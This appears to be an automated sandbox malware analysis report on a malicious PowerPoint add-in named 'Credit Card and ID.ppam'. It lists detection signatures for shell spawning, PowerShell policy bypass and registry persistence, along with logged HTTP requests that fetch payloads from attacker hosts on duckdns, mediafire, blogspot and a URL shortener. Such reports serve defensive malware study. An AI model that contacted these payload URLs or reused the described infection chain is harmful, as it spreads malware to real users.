Windows Analysis Report Credit Card and ID.ppam

Overview

General Information

Sample Name: Credit Card and ID.ppam
Analysis ID: 528749
MD5: 6af8522af160215e3c0f8883588e20d0
SHA1: f7cde5b67c5aa15f8d4366337792e468257b3fda
SHA256: 1ca83ab27034a36bd899d91ed335e692afa949a4f1a1b30887e3f7d8651b63d1
Tags: ppam

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Sigma detected: MSHTA Spawning Windows Shell
Creates autostart registry keys with suspicious values (likely registry only malware)
Sigma detected: Mshta Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Connects to a URL shortener service
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: Credit Card and ID.ppam Virustotal: Detection: 23%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\30[1].htm Avira: detection malicious, Label: JS/Dropper.G4
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 67.199.248.16:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown HTTPS traffic detected: 205.196.123.58:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.45:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbrogr source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbiles source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbLE=C source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process created: C:\Windows\System32\mshta.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: j.mp
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443

Networking:

Uses dynamic DNS services
Source: unknown DNS query: name: www.starinxxxgkular.duckdns.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.16.203.237 104.16.203.237
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ODOASODOccomplermxjdajse HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file/o7mbmqzedgahqhw/30.doc/file HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.mediafire.com
Source: global traffic HTTP traffic detected: GET /k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: ukey=6xpb2tazciakllrv4ebq5j0751h13hdfConnection: Keep-AliveHost: download1370.mediafire.com
Source: global traffic HTTP traffic detected: GET /p/30.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kdaoskdokaodkwldld.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1529571102-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-412f-a301-ebcedf46395e HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /static/v1/widgets/1397508952-widgets.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&go=true HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: accounts.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/branding/googlelogo/1x/googlelogo_color_150x54dp.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/errors/robot.png HTTP/1.1Accept: */*Referer: http://www.starinxxxgkular.duckdns.org/s1/30.txtAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /s1/30.txt HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.starinxxxgkular.duckdns.orgConnection: Keep-Alive
Connects to a URL shortener service
Source: C:\Windows\System32\mshta.exe DNS query: name: j.mp
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49177 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:43 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 
3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1570Date: Thu, 25 Nov 2021 17:30:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 
3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comN equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.coma equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp String found in binary or memory: Content-Security-Policy: script-src 'self' *.google.com *.google-analytics.com 'unsafe-inline' 'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; report-uri /cspreport equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000002.441801634.0000000004140000.00000002.00020000.sdmp, mshta.exe, 00000010.00000002.498911602.0000000003E20000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp String found in binary or memory: pspot.com https://www.youtube.com www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleux"2 equals www.youtube.com (Youtube)
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
